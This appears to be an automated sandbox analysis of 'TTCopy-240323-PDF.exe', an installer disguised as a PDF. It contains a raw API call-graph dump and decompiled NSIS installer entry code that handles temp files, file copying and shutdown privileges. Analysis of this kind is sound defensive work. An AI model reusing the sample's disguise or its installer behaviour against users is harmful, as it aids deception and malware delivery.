4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                                                            Executed Functions

                                                                                            Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                            C-Code - Quality: 78%
                                                                                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\engineer\\Desktop\\TTCopy-240323-PDF.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
